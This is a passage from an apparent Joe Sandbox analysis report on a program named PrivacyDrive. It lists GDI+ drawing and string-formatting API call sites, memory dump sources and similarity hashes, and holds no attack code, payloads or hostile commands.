                                • GdipSetStringFormatFlags.GDIPLUS(00000108,00001000), ref: 004A479A
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: FormatGdipString$Align$CreateFlagsLine
                                • String ID:
                                • API String ID: 1889025379-0
                                • Opcode ID: 9a33e5de6ce44d720b9f1d21e40e3fb45c2cd3d00268d004783f2499a8b94922
                                • Instruction ID: 9f84e90830f94faacd2501bb9ba1cd19f040a3c7652e415f549aa93534a9ad48
                                • Opcode Fuzzy Hash: 9a33e5de6ce44d720b9f1d21e40e3fb45c2cd3d00268d004783f2499a8b94922
                                • Instruction Fuzzy Hash: EF5103B0901245EEEB05CF64C91879ABFF4FF16318F20819DD458AF291D3BA9A09DB90
                                APIs
                                • GdipDrawImage.GDIPLUS(?,00000000), ref: 00405806
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00539A78,000000FF), ref: 00405824
                                • GdipSetStringFormatAlign.GDIPLUS(?,00000002), ref: 0040583C
                                • GdipDeleteStringFormat.GDIPLUS(00000000,?,00000000,?,?,00000014,?,FF414141,?,00000000,?,?,00000014,?,FF414141), ref: 004058E8
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$FormatString$AlignCreateDeleteDrawImage
                                • String ID:
                                • API String ID: 3591613321-0
                                • Opcode ID: d00f998c11ac61cd296428be644efa1bda2d23061c00ad08345528ef6af7aa34
                                • Instruction ID: d8e03f417fab26d0fd3c56658cd6eaed55c8c9658f2d95a917befea81812e60a
                                • Opcode Fuzzy Hash: d00f998c11ac61cd296428be644efa1bda2d23061c00ad08345528ef6af7aa34
                                • Instruction Fuzzy Hash: 26418975204702EFD704CF28C884F56BBE4FF89314F044A2DF859A72A1EB30A858CBA5
                                APIs
                                • SetWindowPos.USER32(00000000), ref: 00433B31
                                  • Part of subcall function 004CB410: GdipSetSmoothingMode.GDIPLUS(?,00000003,?,lB,0056CE40,?,?,?,?,0042E96C,?,?), ref: 004CB477
                                • __CxxThrowException@8.LIBCMT ref: 00433B8B
                                  • Part of subcall function 00502BEB: RaiseException.KERNEL32(?,?,7563D392,005A7F20,?,?,?,?,?,004FFD4E,7563D392,005A7F20,?,00000001), ref: 00502C40
                                • GdipGraphicsClear.GDIPLUS(?,00000000), ref: 00433BC2
                                • PostMessageW.USER32(00000000), ref: 00433C22
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$ClearExceptionException@8GraphicsMessageModePostRaiseSmoothingThrowWindow
                                • String ID:
                                • API String ID: 1584724456-0
                                • Opcode ID: 350d0b1ebf2840fe0e6eb4b4557aa91bd640ab14a29ced17a7b4c5d9194db5c0
                                • Instruction ID: a23faa046682134fe9f5992f1062a70345bf03b543eb0c0b445da283bad3658d
                                • Opcode Fuzzy Hash: 350d0b1ebf2840fe0e6eb4b4557aa91bd640ab14a29ced17a7b4c5d9194db5c0
                                • Instruction Fuzzy Hash: 46415471208701AFD310CF28C859F5BBBE8EB89714F100A1DF5959B2A1DBB5A848CB96
                                APIs
                                • GdipGetImageHeight.GDIPLUS(?,?,?,00000000,00000000), ref: 0043AB57
                                • GdipGetImageWidth.GDIPLUS(?,00000000), ref: 0043AB8C
                                • GdipGetImageHeight.GDIPLUS(?,?,?,00000000,00000000), ref: 0043ABE4
                                • GdipGetImageWidth.GDIPLUS(?,?), ref: 0043AC19
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: GdipImage$HeightWidth
                                • String ID:
                                • API String ID: 87155632-0
                                • Opcode ID: ca9cac723e31787bfe5be79c51fe014e60282ef1d2478efcf86b17f5c190c6ba
                                • Instruction ID: 60864689c4e3d1ce9a2d98c09cd661325c7d2e7e53449e5ba5033771e5d2dc07
                                • Opcode Fuzzy Hash: ca9cac723e31787bfe5be79c51fe014e60282ef1d2478efcf86b17f5c190c6ba
                                • Instruction Fuzzy Hash: 58414F756043069FCB14CF19D894B5ABBE5FF88300F04896EF9899B361D730E819CBA6
                                APIs
                                • GdipGetImageHeight.GDIPLUS(?,?,?,00000000,00000000), ref: 0043A9E7
                                • GdipGetImageWidth.GDIPLUS(?,00000000), ref: 0043AA1C
                                • GdipGetImageHeight.GDIPLUS(?,?,?,00000000,00000000), ref: 0043AA73
                                • GdipGetImageWidth.GDIPLUS(?,?), ref: 0043AAA8
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: GdipImage$HeightWidth
                                • String ID:
                                • API String ID: 87155632-0
                                • Opcode ID: 01ca607efc6987e50454d0ac0c589fa5940be2f02992de76c80933b756efaab0
                                • Instruction ID: ef7eefa47ee764ffd29c69b0a2d180fbcf29540d28d2dac7ed1d7bb482df8181
                                • Opcode Fuzzy Hash: 01ca607efc6987e50454d0ac0c589fa5940be2f02992de76c80933b756efaab0
                                • Instruction Fuzzy Hash: 53414E762043069FCB14CF18D994B5ABBE4FF88300F04896EF8899B361D730D819CBA6
                                APIs
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?,7563D392,?,?,?,7563D392), ref: 00468A7C
                                • GdipSetStringFormatAlign.GDIPLUS(?,00000000), ref: 00468B92
                                • GdipSetStringFormatLineAlign.GDIPLUS(?,00000001), ref: 00468BA3
                                • GdipSetStringFormatFlags.GDIPLUS(?,00001000), ref: 00468BB7
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: FormatGdipString$Align$CreateFlagsLine
                                • String ID:
                                • API String ID: 1889025379-0
                                • Opcode ID: 238f6470b80f116bdf0a66e6890ebfc5d578ce8fffd0367f98eecdcea9b942af
                                • Instruction ID: 6da09c564046291b8ce948ae55f5e98dc09cdec443b53f9bec64c259635cab97
                                • Opcode Fuzzy Hash: 238f6470b80f116bdf0a66e6890ebfc5d578ce8fffd0367f98eecdcea9b942af
                                • Instruction Fuzzy Hash: FF5122B0801345DEEB15CF54C91879ABFF4FF02318F20819DD048AF291D3BA9A0ADB91
                                APIs
                                • GdipDrawImage.GDIPLUS(?,00000000), ref: 004151F7
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00539A78,000000FF), ref: 00415215
                                • GdipSetStringFormatAlign.GDIPLUS(?,00000002), ref: 0041522D
                                • GdipDeleteStringFormat.GDIPLUS(00000000,?,00000000,?,?,00000021,?,FF414141), ref: 00415295
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$FormatString$AlignCreateDeleteDrawImage
                                • String ID:
                                • API String ID: 3591613321-0
                                • Opcode ID: df4b83b9adf1b523246b0ce8e097a9382144786572122b45ea30d5d0c6b13612
                                • Instruction ID: 6dfbc7c8ebecd59f608c0fea9eef570648a8622311eb76a0c6e5ea3eb3f79d85
                                • Opcode Fuzzy Hash: df4b83b9adf1b523246b0ce8e097a9382144786572122b45ea30d5d0c6b13612
                                • Instruction Fuzzy Hash: 9E313775608701EFD715CF28C884B96BBE8FF99750F14471AF859A72A0DB30A844CBA5
                                APIs
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,FF414141,7563D392,?), ref: 004CC368
                                • GdipSetTextRenderingHint.GDIPLUS(00000000,00000005), ref: 004CC37F
                                • GdipMeasureString.GDIPLUS(00000000,?,000000FF,00000000,?,00000000,00000000,?,?), ref: 004CC3B7
                                • GdipDeleteStringFormat.GDIPLUS(00000000), ref: 004CC3F0
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$String$Format$CreateDeleteHintMeasureRenderingText
                                • String ID:
                                • API String ID: 3263196359-0
                                • Opcode ID: 2b4f6c61aee7b9e45ebd9a6a4a7a28c41125c3560ef1e8b05b255a746f50fb74
                                • Instruction ID: 09e53d610c01f2ae1211616a80f7272732c49c8845eccaa2798b86226e55fb17
                                • Opcode Fuzzy Hash: 2b4f6c61aee7b9e45ebd9a6a4a7a28c41125c3560ef1e8b05b255a746f50fb74
                                • Instruction Fuzzy Hash: 93413371A10249EFDB02CF60D884B9EBBB8FF09314F10822AE815B7290E775A895DF50
                                APIs
                                • GdipGetImageHeight.GDIPLUS(?,?), ref: 00409248
                                • GdipGetImageWidth.GDIPLUS(?,?), ref: 0040926F
                                • GdipGetImageHeight.GDIPLUS(?,?), ref: 004092C7
                                • GdipGetImageWidth.GDIPLUS(?,?), ref: 004092EE
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: GdipImage$HeightWidth
                                • String ID:
                                • API String ID: 87155632-0
                                • Opcode ID: 790e16419a5339ed3242f5b8c1d1355ae43437fe184ec655f85a61c521b8808a
                                • Instruction ID: eed248b9beef3cb492fa3724ae78c1d6ee375514bd793ae0381193ca8f78f0f9
                                • Opcode Fuzzy Hash: 790e16419a5339ed3242f5b8c1d1355ae43437fe184ec655f85a61c521b8808a
                                • Instruction Fuzzy Hash: A7311CB1104606AFC750DF29D884B9AF7E9FB94310F14492EF9A8D3290DB30E954DBA5
                                APIs
                                • GdipGetImageHeight.GDIPLUS(?,?), ref: 00409358
                                • GdipGetImageWidth.GDIPLUS(?,?), ref: 0040937F
                                • GdipGetImageHeight.GDIPLUS(?,?), ref: 004093D7
                                • GdipGetImageWidth.GDIPLUS(?,?), ref: 004093FE
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: GdipImage$HeightWidth
                                • String ID:
                                • API String ID: 87155632-0
                                • Opcode ID: 2672969cb5bb4fcc671a0426559697d75ed217e437baea6568ddbb9bf92a8ab4
                                • Instruction ID: a82a16ee1349a0d43971f9266b75aa98ef81c277b78cc4d967d64c43aabd7ee8
                                • Opcode Fuzzy Hash: 2672969cb5bb4fcc671a0426559697d75ed217e437baea6568ddbb9bf92a8ab4
                                • Instruction Fuzzy Hash: 74311CB1204606AFC710CF29D884B9BB7E8FB94311F10462EF9A8D3291D730E918CBA5
                                APIs
                                  • Part of subcall function 004CBC00: GdipCreateSolidFill.GDIPLUS(?,FFFFFFFF), ref: 004CBC55
                                  • Part of subcall function 004CBC00: GdipFillRectangle.GDIPLUS(?,00000000), ref: 004CBCAB
                                  • Part of subcall function 004CBC00: GdipDeleteBrush.GDIPLUS(00000000), ref: 004CBCC7
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,FFF2F2F2,?,00000001,00000000,000000BD,?,?,00000001,00000001), ref: 0045266F
                                • GdipSetStringFormatAlign.GDIPLUS(FFFFFFFF,00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,00539A78), ref: 00452687
                                • GdipSetStringFormatLineAlign.GDIPLUS(FFFFFFFF,00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,00539A78), ref: 004526A0
                                • GdipDeleteStringFormat.GDIPLUS(00000000,?,00000000,00000000,000000AA,0000001E,FFFFFFFF,FF1B64B1), ref: 00452700
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$FormatString$AlignCreateDeleteFill$BrushLineRectangleSolid
                                • String ID:
                                • API String ID: 2519554343-0
                                • Opcode ID: 3dc3701e2667b9d0af440eadf2f274fad97db4e9b81e2eb19c6b4b3ba539e488
                                • Instruction ID: 1d84103dc9312e43c9005ea9e280662007978bdbdab233804babd63aba5da95e
                                • Opcode Fuzzy Hash: 3dc3701e2667b9d0af440eadf2f274fad97db4e9b81e2eb19c6b4b3ba539e488
                                • Instruction Fuzzy Hash: E1317A70208306AFDB10CF14CC86F5ABBE4FB99714F000A2DF955A72E1DB70E9089B96
                                APIs
                                • GdipGetImageHeight.GDIPLUS(?,?), ref: 0043A89D
                                • GdipGetImageWidth.GDIPLUS(?,00000000), ref: 0043A8C4
                                • GdipGetImageHeight.GDIPLUS(?,?), ref: 0043A915
                                • GdipGetImageWidth.GDIPLUS(?,?), ref: 0043A93C
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: GdipImage$HeightWidth
                                • String ID:
                                • API String ID: 87155632-0
                                • Opcode ID: 7ed8786ce8983080883bbac97167c866f6a9aee26c424e72e99940aeba778a02
                                • Instruction ID: d8b839f922d5a463f828fb4bc3599796ddfd93813000dc7badc7289ef24a3618
                                • Opcode Fuzzy Hash: 7ed8786ce8983080883bbac97167c866f6a9aee26c424e72e99940aeba778a02
                                • Instruction Fuzzy Hash: 5E312BB120470BAFD760DF29D844B5ABBE8FF44311F108A2DE599D7250DB30E829DBA5
                                APIs
                                • GdipGetImageHeight.GDIPLUS(?,?), ref: 004081E1
                                • GdipGetImageWidth.GDIPLUS(?,00000000), ref: 0040820C
                                • GdipGetImageHeight.GDIPLUS(?,?), ref: 00408240
                                • GdipGetImageWidth.GDIPLUS(?,00000000), ref: 0040826B
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: GdipImage$HeightWidth
                                • String ID:
                                • API String ID: 87155632-0
                                • Opcode ID: e883daf9a574172d3fc4126492fff0070f63e511ddc0a21f382956b3331f8e60
                                • Instruction ID: eaa291464c2561fdeaef69911abea5bb1afba1cd30948bb03a6afac51bd30a47
                                • Opcode Fuzzy Hash: e883daf9a574172d3fc4126492fff0070f63e511ddc0a21f382956b3331f8e60
                                • Instruction Fuzzy Hash: 1B31C7712047069FD710CF29D984B6AB7E8FB49310F04456DE9A5D72A0DB30E918DBA5
                                APIs
                                • GdipGetImageHeight.GDIPLUS(?,?), ref: 004080E1
                                • GdipGetImageWidth.GDIPLUS(?,00000000), ref: 0040810C
                                • GdipGetImageHeight.GDIPLUS(?,?), ref: 00408140
                                • GdipGetImageWidth.GDIPLUS(?,00000000), ref: 0040816B
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: GdipImage$HeightWidth
                                • String ID:
                                • API String ID: 87155632-0
                                • Opcode ID: 0d5d2bcf955e9eb29db1cfa891ab922e48e8c60a111d25280c1e983a9cbd6f44
                                • Instruction ID: 71f86ceb0c113d1c4f77e10cb63fb7466350600d4cc0eddc6de9fe9586f759d2
                                • Opcode Fuzzy Hash: 0d5d2bcf955e9eb29db1cfa891ab922e48e8c60a111d25280c1e983a9cbd6f44
